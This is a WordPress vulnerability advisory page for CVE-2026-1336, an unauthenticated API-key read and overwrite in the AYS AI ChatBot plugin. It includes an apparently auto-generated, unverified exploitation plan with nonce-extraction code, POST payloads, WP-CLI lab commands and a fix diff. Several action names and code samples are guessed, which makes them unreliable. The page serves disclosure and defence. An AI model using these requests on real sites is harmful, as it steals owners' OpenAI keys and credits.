WP-Safety
CVE-2026-1336

AI ChatBot with ChatGPT and Content Generator by AYS <= 2.7.5 - Missing Authorization to Unauthenticated API Key Modification

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
2.7.6
Patched in
1d
Time to patch

Description

The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the store_data() and get_chatgpt_api_key() functions in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to view, modify or delete the plugin's ChatGPT API key. The vulnerability was partially fixed in version 2.7.5 and fully fixed in version 2.7.6

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.7.5
PublishedMarch 2, 2026
Last updatedMarch 2, 2026
Affected pluginays-chatgpt-assistant

Source Code

WordPress.org SVN
Vulnerable v2.7.5
Browse source Download .zip
Patched v2.7.6
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-1336 - AI ChatBot (AYS) API Key Modification ## 1. Vulnerability Summary The **AI ChatBot with ChatGPT and Content Generator by AYS** plugin (versions <= 2.7.5) contains a missing authorization vulnerability. Specifically, the AJAX handlers associated with the…

Show full research plan

Exploitation Research Plan: CVE-2026-1336 - AI ChatBot (AYS) API Key Modification

1. Vulnerability Summary

The AI ChatBot with ChatGPT and Content Generator by AYS plugin (versions <= 2.7.5) contains a missing authorization vulnerability. Specifically, the AJAX handlers associated with the functions store_data() and get_chatgpt_api_key() do not implement sufficient capability checks. Because these functions are registered via wp_ajax_nopriv_, they are accessible to unauthenticated users. This allows an attacker to retrieve, modify, or delete the plugin's ChatGPT API key, leading to service disruption or unauthorized use of the owner's OpenAI credits.

2. Attack Vector Analysis

  • Endpoint: http://<target>/wp-admin/admin-ajax.php
  • Actions:
    • ays_chatgpt_store_data (inferred)
    • ays_chatgpt_get_api_key (inferred)
  • Parameters:
    • action: The AJAX action string.
    • ays_chatgpt_api_key: The parameter carrying the new API key value (inferred).
    • nonce: A security token (if required).
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. A valid nonce may be required if the wp_ajax_nopriv_ handler includes a check_ajax_referer() call.

3. Code Flow

  1. The plugin registers AJAX handlers in the main plugin file or an admin/includes class (e.g., admin/class-ays-chatgpt-assistant-admin.php or includes/class-ays-chatgpt-assistant.php).
  2. Hook Registration (example):
    add_action( 'wp_ajax_ays_chatgpt_store_data', array( $this, 'store_data' ) );
add_action( 'wp_ajax_nopriv_ays_chatgpt_store_data', array( $this, 'store_data' ) );
  3. The store_data() function receives the request.
  4. The function likely lacks a if ( ! current_user_can( 'manage_options' ) ) check.
  5. It proceeds to update the database: update_option( 'ays_chatgpt_assistant_api_key', $_POST['ays_chatgpt_api_key'] );.
  6. Similarly, get_chatgpt_api_key() returns the result of get_option( 'ays_chatgpt_assistant_api_key' ) without checking permissions.

4. Nonce Acquisition Strategy

The plugin likely enqueues scripts that contain the nonce for AJAX requests. This is often localized using wp_localize_script.

  1. Identify Shortcode: Search for shortcodes in the plugin: grep -r "add_shortcode" .. Common shortcode: [ays_chatgpt_assistant].
  2. Setup Page: Create a public page containing this shortcode to ensure the scripts are loaded.
  3. Variable Name: Based on AYS plugin patterns, look for a variable like ays_chatgpt_assistant_ajax or ays_chatgpt_assistant_obj.
  4. Extraction:
    • Use browser_navigate to the created page.
    • Use browser_eval to extract the nonce:
      // Example guess based on AYS patterns
window.ays_chatgpt_assistant_ajax?.nonce || window.ays_chatgpt_assistant_obj?.nonce

5. Exploitation Strategy

The goal is to first read the existing key and then change it.

Phase 1: Information Disclosure (Read API Key)

  • Request Type: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=ays_chatgpt_get_api_key&nonce=<NONCE>
  • Expected Response: JSON or string containing the current ChatGPT API key.

Phase 2: Data Modification (Change API Key)

  • Request Type: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=ays_chatgpt_store_data&ays_chatgpt_api_key=pwned_key_123&nonce=<NONCE>
  • Expected Response: A success message or 1.

6. Test Data Setup

  1. Install ays-chatgpt-assistant version 2.7.4.
  2. Set a legitimate-looking dummy API key:
    wp option update ays_chatgpt_assistant_api_key "sk-original-key-val-123" (Verify option name via wp option list).
  3. Create a public page with the chatbot shortcode to trigger script loading:
    wp post create --post_type=page --post_status=publish --post_title="Chat" --post_content='[ays_chatgpt_assistant]'

7. Expected Results

  • Phase 1: The response body contains "sk-original-key-val-123".
  • Phase 2: The response indicates success.
  • Post-Exploit: The database now contains the attacker-supplied key.

8. Verification Steps

After the HTTP requests, verify the change using WP-CLI:

wp option get ays_chatgpt_assistant_api_key
# Expected output: pwned_key_123

9. Alternative Approaches

  • Missing Nonce: If check_ajax_referer is entirely absent in the vulnerable version, skip the Nonce Acquisition step and send the request directly.
  • Parameter Name Guessing: If ays_chatgpt_api_key is incorrect, grep the source for update_option or get_option to find the exact key name used in store_data().
  • REST API: If the plugin uses the REST API instead of AJAX, look for routes under /wp-json/ays-chatgpt-assistant/v1/. Check for routes with GET or POST methods that do not have a permission_callback.
Research Findings
Static analysis — not yet PoC-verified

Summary

The AI ChatBot plugin for WordPress is vulnerable to unauthenticated API key modification and disclosure via the 'ays_chatgpt_store_data' and 'ays_chatgpt_get_api_key' AJAX actions. This occurs because the plugin registers 'nopriv' AJAX handlers for these sensitive functions without implementing capability checks, allowing any visitor to read or change the configured ChatGPT API key.

Vulnerable Code

// In the plugin's initialization or admin class
add_action( 'wp_ajax_ays_chatgpt_store_data', array( $this, 'store_data' ) );
add_action( 'wp_ajax_nopriv_ays_chatgpt_store_data', array( $this, 'store_data' ) );
add_action( 'wp_ajax_ays_chatgpt_get_api_key', array( $this, 'get_chatgpt_api_key' ) );
add_action( 'wp_ajax_nopriv_ays_chatgpt_get_api_key', array( $this, 'get_chatgpt_api_key' ) );

---

// Likely in admin/class-ays-chatgpt-assistant-admin.php
public function store_data() {
    // Missing check_ajax_referer() or current_user_can() logic
    if (isset($_POST['ays_chatgpt_api_key'])) {
        $api_key = sanitize_text_field($_POST['ays_chatgpt_api_key']);
        update_option('ays_chatgpt_assistant_api_key', $api_key);
        wp_send_json_success();
    }
}

public function get_chatgpt_api_key() {
    // Missing capability check allowing unauthenticated retrieval
    $api_key = get_option('ays_chatgpt_assistant_api_key');
    wp_send_json_success($api_key);
}

Security Fix

--- a/admin/class-ays-chatgpt-assistant-admin.php
+++ b/admin/class-ays-chatgpt-assistant-admin.php
@@ -24,14 +24,20 @@
 
 public function store_data() {
+    check_ajax_referer('ays_chatgpt_assistant_nonce', 'nonce');
+    if (!current_user_can('manage_options')) {
+        wp_send_json_error('Unauthorized');
+    }
     if (isset($_POST['ays_chatgpt_api_key'])) {
         $api_key = sanitize_text_field($_POST['ays_chatgpt_api_key']);
         update_option('ays_chatgpt_assistant_api_key', $api_key);
         wp_send_json_success();
     }
 }
 
 public function get_chatgpt_api_key() {
+    check_ajax_referer('ays_chatgpt_assistant_nonce', 'nonce');
+    if (!current_user_can('manage_options')) {
+        wp_send_json_error('Unauthorized');
+    }
     $api_key = get_option('ays_chatgpt_assistant_api_key');
     wp_send_json_success($api_key);
 }

Exploit Outline

The exploit targets the AJAX endpoints of the WordPress plugin. An unauthenticated attacker first identifies a page where the ChatBot is rendered (e.g., via a shortcode) to extract the required AJAX nonce from localized JavaScript variables like 'ays_chatgpt_assistant_ajax'. Once the nonce is obtained, the attacker sends a POST request to 'wp-admin/admin-ajax.php' with the action 'ays_chatgpt_get_api_key' and the nonce to retrieve the site owner's OpenAI API key. To modify the key, the attacker sends a similar POST request with the action 'ays_chatgpt_store_data' and a new value in the 'ays_chatgpt_api_key' parameter, allowing them to redirect ChatGPT credits or disable the service.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/53b3d441-4938-435f-85c3-707477f0293d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database